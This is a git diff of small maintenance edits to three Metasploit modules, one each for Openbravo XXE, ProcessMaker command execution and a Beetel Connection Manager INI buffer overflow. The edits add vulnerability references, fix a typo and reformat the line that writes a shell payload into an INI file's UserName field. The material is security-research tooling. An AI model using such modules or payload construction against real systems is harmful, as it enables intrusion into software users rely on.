diff --git a/modules/auxiliary/admin/http/openbravo_xxe.rb b/modules/auxiliary/admin/http/openbravo_xxe.rb index 1927673680..7ada6c5f27 100644 --- a/modules/auxiliary/admin/http/openbravo_xxe.rb +++ b/modules/auxiliary/admin/http/openbravo_xxe.rb @@ -30,6 +30,8 @@ class Metasploit4 < Msf::Auxiliary 'References' => [ ['CVE', '2013-3617'], + ['OSVDB', '99141'], + ['BID', '63431'], ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats'] ], 'License' => MSF_LICENSE, diff --git a/modules/exploits/multi/http/processmaker_exec.rb b/modules/exploits/multi/http/processmaker_exec.rb index a507b478c6..2e47e916bc 100644 --- a/modules/exploits/multi/http/processmaker_exec.rb +++ b/modules/exploits/multi/http/processmaker_exec.rb @@ -25,6 +25,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => 'Brendan Coles ', 'References' => [ + ['OSVDB' => '99199'], + ['BID' => '63411'], ['URL' => 'http://bugs.processmaker.com/view.php?id=13436'] ], 'Payload' => diff --git a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb index b67fc1bf3b..957da96c6e 100644 --- a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb +++ b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb @@ -19,7 +19,7 @@ class Metasploit4 < Msf::Exploit This module exploits a stack-based buffer overflow on Beetel Connection Manager. The vulnerability exists in the parising of the UserName parameter in the NetConfig.ini file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP - SP3 and Windows 7 SP1.b + SP3 and Windows 7 SP1. }, 'License' => MSF_LICENSE, 'Author' => @@ -62,8 +62,7 @@ class Metasploit4 < Msf::Exploit def exploit section = datastore["SECTION"] - sploit = "[#{section}]\r\n" \ - "UserName=#{shell_popper}" + sploit = "[#{section}]\r\nUserName=#{shell_popper}" file_create(sploit) end